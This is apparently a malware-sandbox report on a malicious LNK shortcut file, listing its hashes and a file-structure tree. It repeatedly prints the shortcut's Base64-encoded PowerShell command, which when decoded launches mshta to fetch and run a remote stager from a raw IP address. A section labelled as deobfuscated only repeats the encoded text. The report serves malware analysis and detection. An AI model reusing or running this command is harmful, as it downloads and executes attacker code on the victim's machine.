Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
1fbbb3eca5c1e92231eee641e9c5ecc1
Sha1
927f54ae7509917610f7789b7001d6ff7768a7e8
Sha256
bdfe8ca7a41ccc60e49b5a7164d06263dd0db8e2053128f37281480f5d0a6e30
Sha384
424ebe1038f816f0752b21b84321539d0bed5cbddc63b4f5587e070610a4c18c806618fa01d7ac5a4588fef5c1ebd341
Sha512
597352aef5762d5468b93989a3acb5a6be91708f0b13229558b13bb97ca3f2e6a4ec82faf74c21e6d5d73eda7e17c23155b83214d09498b005934ddbda31672e
SSDeep
24:8J/BHYVKVWU+/CWewCO83YAjjLtjmSYHJm0sHCEJZaSUHWBjs:8x5acwCZIwmdHJUiuZqWB
TLSH
F63106280EE703A9E273C7799BF973634822FA93DD655ABD108097405626111F873E3A
File Structure
1fbbb3eca5c1e92231eee641e9c5ecc1
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AXgBtAHMAaAB0AGEAIABeAF4AaAB0AHQAXgBeAHAAXgBeAF4AXgA6AF4AXgAvAC8AMwAxAF4ALgAxADIAOQAuAF4AXgBeADIAMgAuADQANQBeAF4AXgBeAC8AcwBjAF4AXgBeAHMAXgBeAHQAYQBeAF4AZwBeAF4AXgBlAF4AcgAuAG0AcABeAF4AXgBeADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AXgBtAHMAaAB0AGEAIABeAF4AaAB0AHQAXgBeAHAAXgBeAF4AXgA6AF4AXgAvAC8AMwAxAF4ALgAxADIAOQAuAF4AXgBeADIAMgAuADQANQBeAF4AXgBeAC8AcwBjAF4AXgBeAHMAXgBeAHQAYQBeAF4AZwBeAF4AXgBlAF4AcgAuAG0AcABeAF4AXgBeADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"
1fbbb3eca5c1e92231eee641e9c5ecc1 (1.61 KB)
File Structure
1fbbb3eca5c1e92231eee641e9c5ecc1
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AXgBtAHMAaAB0AGEAIABeAF4AaAB0AHQAXgBeAHAAXgBeAF4AXgA6AF4AXgAvAC8AMwAxAF4ALgAxADIAOQAuAF4AXgBeADIAMgAuADQANQBeAF4AXgBeAC8AcwBjAF4AXgBeAHMAXgBeAHQAYQBeAF4AZwBeAF4AXgBlAF4AcgAuAG0AcABeAF4AXgBeADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA

Malicious

1fbbb3eca5c1e92231eee641e9c5ecc1
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AXgBtAHMAaAB0AGEAIABeAF4AaAB0AHQAXgBeAHAAXgBeAF4AXgA6AF4AXgAvAC8AMwAxAF4ALgAxADIAOQAuAF4AXgBeADIAMgAuADQANQBeAF4AXgBeAC8AcwBjAF4AXgBeAHMAXgBeAHQAYQBeAF4AZwBeAF4AXgBlAF4AcgAuAG0AcABeAF4AXgBeADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"

Malicious

1fbbb3eca5c1e92231eee641e9c5ecc1 > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙